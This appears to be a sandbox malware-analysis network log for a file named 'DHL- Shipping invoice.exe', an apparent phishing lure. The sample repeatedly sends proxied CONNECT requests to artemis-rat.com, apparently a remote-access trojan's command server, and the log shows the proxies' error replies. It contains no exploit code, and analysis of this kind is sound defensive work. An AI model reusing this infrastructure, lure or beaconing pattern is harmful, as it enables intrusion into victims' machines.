                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.763986111 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            163192.168.2.450520104.16.207.86806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.409295082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.496855974 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            164192.168.2.45063443.134.168.214436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.415699959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            165192.168.2.45063643.134.168.214436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.417120934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            166192.168.2.450524104.17.50.45806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.426233053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.513571024 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            167192.168.2.450367111.90.150.10910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.434207916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            168192.168.2.4504565.252.23.22010816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.437647104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            169192.168.2.450235144.24.122.46806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.440900087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.832144022 CET805INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            170192.168.2.45050412.186.205.120806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.441159010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.566791058 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.1
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            171192.168.2.450476184.170.245.14841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.443474054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            172192.168.2.450538162.159.250.145806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.455087900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.542757034 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            173192.168.2.450555185.238.228.96806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.466824055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.553647995 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            174192.168.2.450518138.68.60.831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.475671053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.970204115 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            175192.168.2.450369103.118.46.17680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.476227045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.845062017 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            176192.168.2.450563172.67.231.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.479921103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.567145109 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            177192.168.2.45059466.45.246.19488886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.487076044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            178192.168.2.450503160.153.245.18761166484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.487143993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            179192.168.2.450605172.67.181.97806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.489073992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.576322079 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            180192.168.2.450617162.159.241.5806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.491298914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.578561068 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            181192.168.2.450630104.21.6.88806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.494452000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.581758022 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            182192.168.2.450632172.67.200.220806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.513345003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.600770950 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            183192.168.2.45057951.81.42.25531296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.513348103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.995517969 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            184192.168.2.450509178.54.21.20380816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.514506102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            185192.168.2.450433139.129.162.6531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.531866074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.841727018 CET1286INHTTP/1.1 503 Service Unavailable
                            Server: squid/3.3.8
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 3557
                            X-Squid-Error: ERR_DNS_FAIL 0
                            Vary: Accept-Language
                            Content-Language: en
